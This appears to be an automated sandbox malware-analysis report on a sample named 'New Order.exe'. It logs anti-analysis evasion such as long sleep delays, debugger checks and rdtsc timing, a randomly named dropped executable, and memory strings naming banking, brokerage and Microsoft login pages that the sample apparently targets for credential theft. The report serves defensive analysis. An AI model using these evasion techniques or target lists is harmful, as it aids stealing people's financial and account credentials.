                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: New Order.exe PID: 3224, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 7DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 75F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0184096E rdtsc 8_2_0184096E
                Source: C:\Users\user\Desktop\New Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3213Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1067Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeWindow / User API: threadDelayed 1175Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeWindow / User API: threadDelayed 8797Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\w32tm.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\New Order.exe TID: 936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176Thread sleep count: 1175 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176Thread sleep time: -2350000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176Thread sleep count: 8797 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176Thread sleep time: -17594000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260Thread sleep time: -49500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260Thread sleep time: -34000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\w32tm.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0096CE00 FindFirstFileW,FindNextFileW,FindClose,14_2_0096CE00
                Source: C:\Users\user\Desktop\New Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 131E9KP.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 131E9KP.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 131E9KP.14.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 131E9KP.14.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 131E9KP.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 131E9KP.14.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 131E9KP.14.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: w32tm.exe, 0000000E.00000002.4631373048.00000000009F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 131E9KP.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 131E9KP.14.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 131E9KP.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 131E9KP.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: XVZmwHdSYwx.exe, 00000011.00000002.4633349461.0000000000E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: 131E9KP.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: firefox.exe, 00000013.00000002.2799700111.00000232689FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIIPP
                Source: 131E9KP.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 131E9KP.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 131E9KP.14.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 131E9KP.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 131E9KP.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 131E9KP.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 131E9KP.14.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 131E9KP.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 131E9KP.14.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 131E9KP.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 131E9KP.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 131E9KP.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\New Order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0184096E rdtsc 8_2_0184096E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00417EA3 LdrLoadDll,8_2_00417EA3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01840185 mov eax, dword ptr fs:[00000030h]8_2_01840185
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BC188 mov eax, dword ptr fs:[00000030h]8_2_018BC188
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BC188 mov eax, dword ptr fs:[00000030h]8_2_018BC188
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A4180 mov eax, dword ptr fs:[00000030h]8_2_018A4180
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A4180 mov eax, dword ptr fs:[00000030h]8_2_018A4180
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188019F mov eax, dword ptr fs:[00000030h]8_2_0188019F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188019F mov eax, dword ptr fs:[00000030h]8_2_0188019F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188019F mov eax, dword ptr fs:[00000030h]8_2_0188019F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188019F mov eax, dword ptr fs:[00000030h]8_2_0188019F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FC156 mov eax, dword ptr fs:[00000030h]8_2_017FC156
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C61C3 mov eax, dword ptr fs:[00000030h]8_2_018C61C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C61C3 mov eax, dword ptr fs:[00000030h]8_2_018C61C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E1D0 mov eax, dword ptr fs:[00000030h]8_2_0187E1D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E1D0 mov eax, dword ptr fs:[00000030h]8_2_0187E1D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0187E1D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E1D0 mov eax, dword ptr fs:[00000030h]8_2_0187E1D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E1D0 mov eax, dword ptr fs:[00000030h]8_2_0187E1D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D61E5 mov eax, dword ptr fs:[00000030h]8_2_018D61E5
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018301F8 mov eax, dword ptr fs:[00000030h]8_2_018301F8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov eax, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov ecx, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov eax, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov eax, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov ecx, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov eax, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov eax, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov ecx, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov eax, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE10E mov ecx, dword ptr fs:[00000030h]8_2_018AE10E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AA118 mov ecx, dword ptr fs:[00000030h]8_2_018AA118
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AA118 mov eax, dword ptr fs:[00000030h]8_2_018AA118
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AA118 mov eax, dword ptr fs:[00000030h]8_2_018AA118
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AA118 mov eax, dword ptr fs:[00000030h]8_2_018AA118
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C0115 mov eax, dword ptr fs:[00000030h]8_2_018C0115
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01830124 mov eax, dword ptr fs:[00000030h]8_2_01830124
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01894144 mov eax, dword ptr fs:[00000030h]8_2_01894144
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01894144 mov eax, dword ptr fs:[00000030h]8_2_01894144
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01894144 mov ecx, dword ptr fs:[00000030h]8_2_01894144
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01894144 mov eax, dword ptr fs:[00000030h]8_2_01894144
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01894144 mov eax, dword ptr fs:[00000030h]8_2_01894144
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01898158 mov eax, dword ptr fs:[00000030h]8_2_01898158
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806154 mov eax, dword ptr fs:[00000030h]8_2_01806154
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806154 mov eax, dword ptr fs:[00000030h]8_2_01806154
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FA197 mov eax, dword ptr fs:[00000030h]8_2_017FA197
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FA197 mov eax, dword ptr fs:[00000030h]8_2_017FA197
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FA197 mov eax, dword ptr fs:[00000030h]8_2_017FA197
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180208A mov eax, dword ptr fs:[00000030h]8_2_0180208A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018980A8 mov eax, dword ptr fs:[00000030h]8_2_018980A8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C60B8 mov eax, dword ptr fs:[00000030h]8_2_018C60B8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C60B8 mov ecx, dword ptr fs:[00000030h]8_2_018C60B8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018820DE mov eax, dword ptr fs:[00000030h]8_2_018820DE
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FA020 mov eax, dword ptr fs:[00000030h]8_2_017FA020
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FC020 mov eax, dword ptr fs:[00000030h]8_2_017FC020
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018860E0 mov eax, dword ptr fs:[00000030h]8_2_018860E0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018080E9 mov eax, dword ptr fs:[00000030h]8_2_018080E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018420F0 mov ecx, dword ptr fs:[00000030h]8_2_018420F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01884000 mov ecx, dword ptr fs:[00000030h]8_2_01884000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
